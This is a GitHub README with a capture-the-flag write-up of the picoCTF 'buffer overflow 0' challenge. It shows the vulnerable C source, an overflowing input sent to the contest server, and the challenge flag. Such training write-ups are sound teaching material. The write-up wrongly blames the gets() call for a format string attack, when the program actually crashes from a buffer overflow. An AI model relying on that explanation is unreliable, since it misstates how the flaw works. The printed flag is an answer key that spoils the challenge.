Skip to content

Latest commit

 

History

History

buffer-overflow-0

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
flag.txt
flag.txt
 
 
vuln
vuln
 
 
vuln.c
vuln.c
 
 

README.md

Challenge: buffer overflow 0

Category: Binary Exploitation

Point Value: 100

Author: Alex Fulton / Palash Oswal


Description:

Smash the stack
Let's start off simple, can you overflow the correct buffer? The program is available here.1 local You can view source here.1 local And connect with it using: nc saturn.picoctf.net 531821

Write-Up:

Download all the things:

wget https://artifacts.picoctf.net/c/525/vuln
wget https://artifacts.picoctf.net/c/525/vuln.c

Lets start by runnin vuln and see what we get. First we need to set the executible bit using chmod:

chmod +x vuln

└─$ ./vuln
Please create 'flag.txt' in this directory with your own debugging flag.

Now create a flag.txt and restart 'vuln':

echo "picoCTF{testflag}" > flag.txt

└─$ ./vuln
Input: test
The program will exit now

We are prompted to input a value, and when doing so the program just seems to exit. So let's look at the source code and see if we can figure out what's going on. Looking at the main function we can see that it uses the 'gets()' function to obtain the user input. This function is vulnerable to a Format String Attack, so we should be able to get the program to output memory values by passing in the '%x' format string.

int main(int argc, char **argv){
  
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }
  
  fgets(flag,FLAGSIZE_MAX,f);
  signal(SIGSEGV, sigsegv_handler); // Set up signal handler
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);


  printf("Input: ");
  fflush(stdout);
  char buf1[100];
  gets(buf1); 
  vuln(buf1);
  printf("The program will exit now\n");
  return 0;
}

Let's try it out and see what happens:

└─$ ./vuln
Input: %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x 
picoCTF{test_flag}

And as you can see passing in all of those %x format strings, the program prints out our test flag locally. Now lets try it on the supplied server.

└─$ nc saturn.picoctf.net 65445
Input: %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
picoCTF{ov3rfl0ws_ar3nt_that_bad_6091cc95}

As you can see we get our flag for the challenge!

FLAG:

picoCTF{ov3rfl0ws_ar3nt_that_bad_6091cc95}

Footnotes

  1. Included links to the source code may be out of date as they were what I recorded during the competition, and may be different now. 2 3